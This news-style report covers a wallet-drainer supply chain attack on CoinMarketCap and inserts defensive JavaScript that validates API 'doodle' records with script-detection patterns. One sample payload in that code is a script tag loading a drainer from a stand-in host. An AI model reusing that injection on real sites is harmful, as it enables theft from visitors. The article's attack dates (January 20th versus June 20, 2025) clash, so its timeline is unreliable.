CoinMarketCap, a popular cryptocurrency data provider, recently suffered a website supply chain attack that exposed its visitors to a wallet drainer campaign. The attack, carried out on the night of Friday, January 20th, led to a total loss of $43,266 across 110 unique victims. During the day of the attack, visitors to the site were met with Web3-style popups asking them to connect their wallets.

The exploit behind this breach was a modified JSON payload that included a malicious script tag. Once rendered by the site, that tag loaded a wallet drainer script from an external domain, “static.cdnkit.io,” into the CoinMarketCap website.

Technical Details of the Attack

CoinMarketCap's security team discovered an XSS vulnerability on June 20, 2025, tied to a doodle image displayed on the homepage.

"On June 20, 2025, our security team identified a vulnerability related to a doodle image displayed on our homepage. This doodle image contained a link that triggered malicious code through an API call, resulting in an unexpected popup for some users when visiting our homepage." - CoinMarketCap

The modified JSON payload carried the following malicious script tag. The tag was used to inject a wallet drainer script into CoinMarketCap from an external site, “static.cdnkit.io,” hosted on GitHub.
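The failure described above is that a JSON field fetched from an API was trusted all the way into the page's DOM, so a script tag or off-site URL hidden in that field became live markup. The following is an added example, not CoinMarketCap's code and not the payload from the incident: a defensive validator for a hypothetical "doodle" record (image URL, link URL, caption) that rejects non-HTTPS or non-allowlisted hosts in URL fields, rejects any markup in text fields, and scans the raw JSON text for script or event-handler markup before it is even parsed. The record shape, the allowlisted host `cdn.example-site.com` and the sample payloads are all constructed for this illustration.

```javascript
// Added example, not CoinMarketCap's code. The "doodle" record shape
// (image, link, caption) and the allowlist host are assumptions.
const ALLOWED_ASSET_HOSTS = new Set(["cdn.example-site.com"]); // constructed allowlist

// Any HTML tag at all in a field that should be plain text.
const TAG_PATTERN = /<\s*\/?\s*[a-z][^>]*>/i;
// Script tags, javascript: URLs and inline event handlers (onerror=, onload=, ...).
const SCRIPT_PATTERN = /<\s*script\b|javascript\s*:|\bon\w+\s*=/i;

// Validate one URL-valued field: absolute, HTTPS, and host on the allowlist.
function validateUrlField(value, fieldName) {
  const findings = [];
  let url;
  try {
    url = new URL(String(value));
  } catch {
    findings.push(`${fieldName}: not an absolute URL`);
    return findings;
  }
  if (url.protocol !== "https:") {
    findings.push(`${fieldName}: scheme ${url.protocol} not allowed`);
  }
  if (!ALLOWED_ASSET_HOSTS.has(url.hostname)) {
    findings.push(`${fieldName}: host "${url.hostname}" not on allowlist`);
  }
  return findings;
}

// Validate a parsed doodle record. Returns { ok, findings } so callers can log
// the reasons and fall back to a default doodle instead of rendering the record.
function validateDoodle(doodle) {
  const findings = [];
  for (const field of ["image", "link"]) {
    findings.push(...validateUrlField(doodle[field], field));
  }
  const caption = String(doodle.caption ?? "");
  if (TAG_PATTERN.test(caption)) findings.push("caption: contains HTML markup");
  if (SCRIPT_PATTERN.test(caption)) findings.push("caption: contains script or event-handler markup");
  return { ok: findings.length === 0, findings };
}

// Defense in depth: JSON.parse happily accepts "<script>" inside a string value,
// so scan the raw response body before trusting it at all.
function scanRawJson(text) {
  return SCRIPT_PATTERN.test(text) || /<\s*iframe\b/i.test(text);
}

// Constructed sample payloads (not data from the incident).
const SAMPLE_DOODLE_OK = {
  image: "https://cdn.example-site.com/doodle.png",
  link: "https://cdn.example-site.com/event",
  caption: "Summer event",
};
const SAMPLE_DOODLE_BAD = {
  image: "https://cdn.example-site.com/doodle.png",
  link: "https://cdn.example-site.com/event",
  caption: '<script src="https://third-party.example/drainer.js"></script>',
};

// Stand-alone demonstration.
console.log("clean record:", validateDoodle(SAMPLE_DOODLE_OK));
console.log("tampered record:", validateDoodle(SAMPLE_DOODLE_BAD));
console.log("raw scan of tampered body:", scanRawJson(JSON.stringify(SAMPLE_DOODLE_BAD)));
```

On the rendering side the same rule applies: assign the caption with `textContent` and the URLs with `setAttribute` rather than building markup with `innerHTML`, and pair this with a Content-Security-Policy whose `script-src` lists only first-party and known vendor hosts, so that a tag pointing at an unexpected domain is blocked by the browser even if a validation step is bypassed.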

The threat actors responsible for the CoinMarketCap attack were found to be communicating in French in a Telegram channel.

Impact and Response

The phishing attack on CoinMarketCap led to the unauthorized withdrawal of assets valued at $43,266 from 110 victims’ accounts. The incident highlights the growing threat of wallet drainers, which stole almost $500 million in 2024 through attacks targeting more than 300,000 wallet addresses.

"Upon discovery, we acted immediately to remove the problematic content, identified the root cause, and comprehensive measures have been implemented to isolate and mitigate the issue." - CoinMarketCap

"We can confirm all systems are now fully operational, and CoinMarketCap is safe and secure for all users." - CoinMarketCap

Supply Chain Vulnerabilities

"This was a supply chain attack, meaning the breach didn't target CMC's own servers but a third-party tool or resource used by CMC," - c/side

Supply chain attacks are hard to detect because they leverage a trusted component of a platform. The CoinMarketCap incident underscores that reality and the need for robust security practices covering every element of a website’s infrastructure, including the third-party software and tools it depends on.

"Such attacks are hard to detect because they exploit trusted elements of a platform." - c/side
